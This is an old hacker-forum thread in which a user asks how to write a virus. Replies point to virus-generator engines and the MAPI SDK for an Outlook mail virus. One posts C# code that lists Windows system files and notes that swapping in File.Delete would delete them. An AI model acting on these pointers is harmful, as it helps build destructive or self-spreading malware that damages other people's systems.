HEY ALL HACKERS BRO (THE MAKING OF VIRUS)

Discussion about hacker.org's server
Post Reply
User avatar
anicoolrocks
Posts: 29
Joined: Tue Jul 01, 2008 5:03 am

HEY ALL HACKERS BRO (THE MAKING OF VIRUS)

Post by anicoolrocks »

CAN ANY BRO TELL ME AS HOW TO MAKE VIRUS IN C++ OF VB
AND ITS WORKING
The_Dark_Avenger
Posts: 115
Joined: Wed Jun 11, 2008 9:47 pm

Post by The_Dark_Avenger »

And DO YOU KNOW THESE LANGUAGES????
If you knew them, you would know. Just fucking google it
User avatar
anicoolrocks
Posts: 29
Joined: Tue Jul 01, 2008 5:03 am

Post by anicoolrocks »

thakss i will search if i dont get i bang on yr hank avenger :twisted: :twisted: :twisted: :twisted:
dorahan
Posts: 105
Joined: Tue May 27, 2008 10:36 am
Location: HkRkoz al KuwaiT 2019 HaCkEr 101

Post by dorahan »

Mmm... sorry i never try to make any virus by writting the program by myself... because i don't understand both C++ and VBS. By the way, if you wanna make some virus which are not strong (only a weak viruses), it's better for you to find it at google or something... try to search the keyword like 'virus engine' or something like that... I ever downloaded some of virus engine like that... but it was some year ago... so i forget the link... It's quite nice bro, making virus from the engine instantly... Btw, the viruses which are created by virus engine usually based on vbs... Hope this useful for u...
~� dorahan �~
HkRkoz al KuwaiT 2019 HaCkEr 101
martin_great_boy
Posts: 23
Joined: Tue May 27, 2008 10:05 am
Location: Rockville

ha ha

Post by martin_great_boy »

gw bsa buat cuma Gen FFE fajar!


wkwkwkkwkw



gk merusak koq, yg pngin sample nya minta ke gw ja :P
martin love A_ _ _ L
carlsudd
Posts: 1
Joined: Wed Jul 30, 2008 3:13 pm

Post by carlsudd »

The first thing you need to think about is what the virus is supposed to achieve and who it shoud target.

If you for example want to create a mail virus targeting MS outlook a good start is looking into the MAPI SDK Libraries. As a start the VBA File System Object is also good looking into for some very basic file system activates.

/Quadbrains
WhiteKnight
Posts: 276
Joined: Fri Aug 15, 2008 8:21 am

Post by WhiteKnight »

My most preferred language would be C#, but I do know how to write C++.

If you change Console.WriteLine(file); to System.IO.File.Delete(file); then it considered malicious. It is as simple like that.

using System;

namespace ConsoleApplication1
{
class Program
{
static void Main(string[] args)
{
foreach (string file in System.IO.Directory.GetFiles(Environment.SystemDirectory))
{
Console.WriteLine(file);
}
Console.ReadLine();
}
}
}
Post Reply